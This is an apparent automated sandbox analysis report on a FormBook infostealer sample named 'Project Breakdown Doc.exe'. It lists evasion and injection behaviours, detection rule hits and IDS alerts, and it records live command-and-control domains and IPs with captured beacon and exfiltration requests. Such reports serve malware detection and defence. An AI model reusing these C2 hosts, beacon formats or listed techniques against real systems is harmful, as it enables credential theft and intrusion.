
Windows Analysis Report
Project Breakdown Doc.exe

Overview

General Information

Sample name: Project Breakdown Doc.exe
Analysis ID: 1560859
MD5: bf7d24a56c64e6632ff2ca51f08908f8
SHA1: 428d664141dc9d2318dacdf51c4ac9efbbdd3847
SHA256: ade930428485f335d9ab8526b0073be5cdf902c7316bf24bf86c69c85ed67d7e
Tags: exe, user-smica83

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Project Breakdown Doc.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\Project Breakdown Doc.exe" MD5: BF7D24A56C64E6632FF2CA51F08908F8)
    • svchost.exe (PID: 7316 cmdline: "C:\Users\user\Desktop\Project Breakdown Doc.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • VFfhzkOtKq.exe (PID: 5600 cmdline: "C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • powercfg.exe (PID: 7752 cmdline: "C:\Windows\SysWOW64\powercfg.exe" MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
          • VFfhzkOtKq.exe (PID: 4548 cmdline: "C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7928 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.2936457400.00000000032F0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.2259560056.0000000003960000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.2938680835.0000000004CA0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.2259200561.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.2260126536.0000000004C00000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
1.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\Project Breakdown Doc.exe", CommandLine: "C:\Users\user\Desktop\Project Breakdown Doc.exe", CommandLine|base64offset|contains: 0, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Project Breakdown Doc.exe", ParentImage: C:\Users\user\Desktop\Project Breakdown Doc.exe, ParentProcessId: 7300, ParentProcessName: Project Breakdown Doc.exe, ProcessCommandLine: "C:\Users\user\Desktop\Project Breakdown Doc.exe", ProcessId: 7316, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\Project Breakdown Doc.exe", CommandLine: "C:\Users\user\Desktop\Project Breakdown Doc.exe", CommandLine|base64offset|contains: 0, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Project Breakdown Doc.exe", ParentImage: C:\Users\user\Desktop\Project Breakdown Doc.exe, ParentProcessId: 7300, ParentProcessName: Project Breakdown Doc.exe, ProcessCommandLine: "C:\Users\user\Desktop\Project Breakdown Doc.exe", ProcessId: 7316, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-22T12:42:31.928508+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49808 | 43.205.198.29 | 80 | TCP
2024-11-22T12:42:34.600224+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49815 | 43.205.198.29 | 80 | TCP
2024-11-22T12:42:37.256489+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49821 | 43.205.198.29 | 80 | TCP
2024-11-22T12:42:46.715244+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49843 | 172.67.220.36 | 80 | TCP
2024-11-22T12:42:49.383453+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49850 | 172.67.220.36 | 80 | TCP
2024-11-22T12:42:52.184148+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49859 | 172.67.220.36 | 80 | TCP
2024-11-22T12:43:01.932322+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49882 | 194.245.148.189 | 80 | TCP
2024-11-22T12:43:04.796233+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49888 | 194.245.148.189 | 80 | TCP
2024-11-22T12:43:08.086956+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49899 | 194.245.148.189 | 80 | TCP


                AV Detection

Source: Project Breakdown Doc.exe | ReversingLabs: Detection: 52%
Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.2936457400.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2259560056.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2938680835.0000000004CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2259200561.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2260126536.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2936946828.0000000003450000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2936746920.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2935024128.0000000000D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Project Breakdown Doc.exe | Joe Sandbox ML: detected
Source: Project Breakdown Doc.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: powercfg.pdbGCTL source: svchost.exe, 00000001.00000003.2228239971.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2228322978.000000000342D000.00000004.00000020.00020000.00000000.sdmp, VFfhzkOtKq.exe, 00000005.00000002.2936102809.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: VFfhzkOtKq.exe, 00000005.00000002.2934981003.000000000006E000.00000002.00000001.01000000.00000005.sdmp, VFfhzkOtKq.exe, 00000007.00000000.2336603194.000000000006E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Project Breakdown Doc.exe, 00000000.00000003.1684251389.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, Project Breakdown Doc.exe, 00000000.00000003.1683276387.0000000004230000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2157215051.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2159064996.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2259594003.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2259594003.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000006.00000002.2937132231.000000000386E000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000006.00000003.2262467626.0000000003528000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000006.00000002.2937132231.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000006.00000003.2259628969.0000000003372000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Project Breakdown Doc.exe, 00000000.00000003.1684251389.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, Project Breakdown Doc.exe, 00000000.00000003.1683276387.0000000004230000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.2157215051.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2159064996.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2259594003.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2259594003.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000006.00000002.2937132231.000000000386E000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000006.00000003.2262467626.0000000003528000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000006.00000002.2937132231.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000006.00000003.2259628969.0000000003372000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: powercfg.exe, 00000006.00000002.2935230373.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000006.00000002.2937780821.0000000003CFC000.00000004.10000000.00040000.00000000.sdmp, VFfhzkOtKq.exe, 00000007.00000002.2937216362.000000000286C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2570813989.000000002144C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: powercfg.exe, 00000006.00000002.2935230373.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000006.00000002.2937780821.0000000003CFC000.00000004.10000000.00040000.00000000.sdmp, VFfhzkOtKq.exe, 00000007.00000002.2937216362.000000000286C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2570813989.000000002144C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: powercfg.pdb source: svchost.exe, 00000001.00000003.2228239971.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2228322978.000000000342D000.00000004.00000020.00020000.00000000.sdmp, VFfhzkOtKq.exe, 00000005.00000002.2936102809.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00CA4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00CA4696
Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00CAC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00CAC9C7
Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00CAC93C FindFirstFileW,FindClose,0_2_00CAC93C
Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00CAF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CAF200
Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00CAF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CAF35D
Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00CAF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CAF65E
Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00CA3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00CA3A2B
Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00CA3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00CA3D4E
Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00CABF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CABF27

                Networking

Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49808 -> 43.205.198.29:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49843 -> 172.67.220.36:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49850 -> 172.67.220.36:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49821 -> 43.205.198.29:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49888 -> 194.245.148.189:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49882 -> 194.245.148.189:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49899 -> 194.245.148.189:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49859 -> 172.67.220.36:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49815 -> 43.205.198.29:80
Source: Joe Sandbox View | IP Address: 194.245.148.189 194.245.148.189
Source: Joe Sandbox View | ASN Name: LILLY-ASUS LILLY-ASUS
Source: Joe Sandbox View | ASN Name: CSLDE CSLDE
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00CB25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00CB25E2
Source: global traffic | HTTP traffic detected: GET /mz0w/?qjBT=BfTHe4BP_zkdflN&AFF=uMzU0JGK22aEYJLN9gIRRbcx6PQvWyWv0SPCs66KRtTFzrJJ373CiBnwq6iLrm6CBfWGplZZf3wVkFmev9wws6pM55HNj3BAq/9ra29WeR04lUyUIOcydT8= HTTP/1.1 | Host: www.qqa79.top | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-us | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /6pwo/?AFF=OcYLCa3XOMtt+RsgzD1zLQYXF21NRX3aDgwcqG8KHHMgaFOqYIh5VwBJiTVI7K2l1+vZ/nsgVnM6ADXGg1abnTc9bVWqvwMitNejIQMZs4A8D92e/CCvcvI=&qjBT=BfTHe4BP_zkdflN HTTP/1.1 | Host: www.1secondlending.one | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-us | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /rk61/?qjBT=BfTHe4BP_zkdflN&AFF=4Jev6jkxg6xEO7Dapp2OtVT6jS0ALsNacNocs9uTAtM/sd7AmwK5VubVBVupph+Y/y0F/E1wxEQcV5PZ7sI9NGZN+wjn/QV3LQCc1WVNeTcwGOVDWPFPiYw= HTTP/1.1 | Host: www.supernutra01.online | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-us | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
Source: global traffic | DNS traffic detected: DNS query: www.qqa79.top
Source: global traffic | DNS traffic detected: DNS query: www.1secondlending.one
Source: global traffic | DNS traffic detected: DNS query: www.supernutra01.online
Source: global traffic | DNS traffic detected: DNS query: www.wine-drinkers.club
                Source: unknownHTTP traffic detected: POST /6pwo/ HTTP/1.1Host: www.1secondlending.oneAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usAccept-Encoding: gzip, deflate, brContent-Length: 200Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedOrigin: http://www.1secondlending.oneReferer: http://www.1secondlending.one/6pwo/User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36Data Raw: 41 46 46 3d 44 65 77 72 42 73 32 6d 54 39 6c 6d 71 53 30 68 38 78 6f 2f 46 68 77 57 47 42 70 4b 5a 57 54 4e 50 78 35 6e 73 32 31 56 41 55 6b 6f 62 58 71 71 64 5a 45 48 53 51 4e 7a 6c 79 46 4d 68 37 69 6b 39 2f 4f 64 72 48 41 61 4d 6b 41 70 41 52 62 65 75 55 6e 4f 6a 32 6f 30 62 45 72 51 73 41 4d 41 75 39 32 55 4a 41 6b 6d 76 37 63 4a 50 38 4c 6a 75 6a 79 62 56 76 61 63 51 75 6c 79 67 38 63 30 36 70 59 6f 41 75 33 37 65 6e 6a 69 67 6f 50 45 5a 38 63 68 6c 49 65 57 43 4d 6b 65 55 53 58 79 73 46 69 32 43 72 48 35 36 58 39 6f 6f 42 67 2b 52 6a 4b 34 67 51 45 2f 2b 4a 78 50 70 70 59 67 52 41 3d 3d Data Ascii: AFF=DewrBs2mT9lmqS0h8xo/FhwWGBpKZWTNPx5ns21VAUkobXqqdZEHSQNzlyFMh7ik9/OdrHAaMkApARbeuUnOj2o0bErQsAMAu92UJAkmv7cJP8LjujybVvacQulyg8c06pYoAu37enjigoPEZ8chlIeWCMkeUSXysFi2CrH56X9ooBg+RjK4gQE/+JxPppYgRA==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Nov 2024 11:42:14 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Nov 2024 11:42:31 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Nov 2024 11:42:34 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 